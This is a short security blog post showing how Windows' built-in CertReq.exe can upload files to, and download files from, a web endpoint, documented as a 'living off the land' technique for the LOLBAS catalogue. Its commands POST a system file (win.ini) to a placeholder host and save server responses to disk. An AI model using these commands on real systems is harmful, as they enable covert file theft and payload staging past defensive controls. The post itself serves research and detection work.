Upload and download small files with CertReq.exe

Upload and download small files with CertReq.exe

I stumbled on another lesser known LOLBAS (https://lolbas-project.github.io/) for upload and downloading (small) files. CertReq.exe is present on Windows and its intended use to to assist with the creation and installation of certificates.

You can use it as follows:

Upload a file via HTTP POST

Upload the file c:\windows\win.ini to the endpoint https://example.org/ via HTTP POST.

CertReq -Post -config https://example.org/ c:\windows\win.ini

Download a file via HTTP POST and save it to disk

Download the file served when a HTTP POST request is made to https://example.org/ and save it to output.txt.

CertReq -Post -config https://example.org/ c:\windows\win.ini output.txt

Download a file via HTTP POST and show contents

Download the file served when a HTTP POST request is made to https://example.org/ and show contents.

CertReq -Post -config https://example.org/ c:\windows\win.ini

Example Output

Note it shows the HTTP response headers in all cases and the content of HTTP response is dependent if an output file is specified.

>CertReq -Post -config https://example.org/ c:\windows\win.ini
OK
HTTP/1.1 200 OK
Cache-Control: max-age=604800
Date: Tue, 07 Jul 2020 19:50:58 GMT
Content-Length: 1256
Content-Type: text/html; charset=UTF-8
Expires: Tue, 14 Jul 2020 19:50:58 GMT
Last-Modified: Thu, 17 Oct 2019 07:18:26 GMT
Accept-Ranges: bytes
ETag: "3147526947"
Server: EOS (vny/0454)

<!doctype html>
<html>
<head>
<title>Example Domain</title>
--snip--

Note: Small files only!

Due to something going on with the internals of CertReq.exe only small (not sure on specific size limitations) files appear to work - otherwise you get the below error!

The CertReq.exe fails with the above error if the file to upload or download is too big

Notes

The user agent for my test Windows 10 version 19041.329 was:

Mozilla/4.0 (compatible; Win32; NDES client 10.0.19041.1/vb_release)

I also added a pull request to the LOLBAS project:

Create certreq.yml by dtmsecurity · Pull Request #75 · LOLBAS-Project/LOLBAS
For informational and educational purposes only.

"Sometimes, hacking is just someone spending more time on something than anyone else might reasonably expect." @JGamblin